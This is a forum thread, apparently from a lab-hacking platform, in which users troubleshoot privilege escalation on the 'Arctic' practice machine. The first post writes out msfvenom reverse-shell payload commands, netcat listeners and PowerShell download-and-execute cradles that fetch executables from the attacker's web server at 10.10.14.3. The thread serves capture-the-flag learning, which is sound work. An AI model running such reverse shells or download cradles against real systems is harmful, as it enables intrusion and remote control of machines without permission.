Arctic

TheBrick · May 11, 2020, 12:57am

Having privesc issues with this box.

Tried following an IppSec video and the official write-up.

Please, I would like a non-meterpreter solution.

Basically so far I’m able to get the user shell pretty easily with

searchsploit coldfusion
Adobe ColdFusion Server 8.0.1 - ‘administrator/logviewer/searchlog.cfm?startRow’ Cross-Site Scripting | exploits/cfm/webapps/33168.txt

// I browse to the payload and activate it.

nc -lvnp 4444

// I now have user shell tolis and get user.txt

// Next I build my payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit2.exe

nc -lvnp 5432

// I set up my web server in the directory I am working this box.

python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …

// It is listening on port 8000.

// I name my msfvenom payload as exploit2.exe and make sure that it is in my web server.

// I run the next command in my windows user shell and it doesn’t work. No status updates in my web server terminal.

powershell “(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)"
powershell (new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)

// try IEX

powershell “IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)”
powershell IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)

// Try these

powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)”
powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)

// This last one is the only one that got a response in my mini web server. Despite IppSec and the official writeup’s instructions. For some reason the double quotes are giving the shell bad characters (diamond with a question mark) and seems to not like the command.

// Now my issue is that the payload does not seem to execute. my nc 5432 listener returns nothing

// Trying a different payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit3.exe

// Tried these

powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit3.exe’)

//Still nothing. Any thoughts?

j0nny5 · May 13, 2020, 8:17am

does it actually download the file, or is it trying to automatically execute? I think this method only works if the requested file contains a powershell exploit. I’m having a pig of a time getting an exploit onto the box, ftp with a config file isn’t working, can’t get powershell to work, and the write up saying to change the timers in metasploit doesn’t appear to work either - feels like i’m missing something major

j0nny5 · May 13, 2020, 11:43am

never could get that to work - i think the FTP issue is related to not being able to switch to passive - a common VBS script works

Topic		Replies	Views
How to use meterpreter/reverse_tcp with PowerShell? Off-topic	3	10429	August 4, 2023
Arctic Machine Help Machines	0	466	February 28, 2019
Getting Meterpreter and ms16_032_secondary_logon_handle_privesc working Machines	1	863	August 24, 2019
For Those struggling with Priv Esc in Arctic Machines privledge-escelatio , arctic , powershell	0	977	July 16, 2020
Optimum Video by IppSec Video Tutorials	7	4247	February 26, 2019

Arctic

Related topics